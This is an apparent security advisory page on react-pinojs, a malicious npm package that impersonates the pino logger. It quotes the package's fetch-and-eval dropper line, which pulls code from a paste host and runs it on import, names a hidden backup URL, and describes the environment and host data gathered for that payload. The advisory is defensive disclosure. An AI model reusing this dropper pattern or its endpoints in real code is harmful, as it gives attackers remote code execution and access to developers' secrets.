Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

react-pinojsnpm

Malicious code in react-pinojs (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5488
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall react-pinojs

What this malware does

Package impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. Any project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.

Malicious versions

1 flagged
1.0.6

Indicators of compromise (SHA-256)

db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63

Frequently asked questions

No. react-pinojs on npm has been identified as a malicious package (version 1.0.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005247

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
react-pinojs (npm) malicious package — MAL-2026-5488 | O3 Security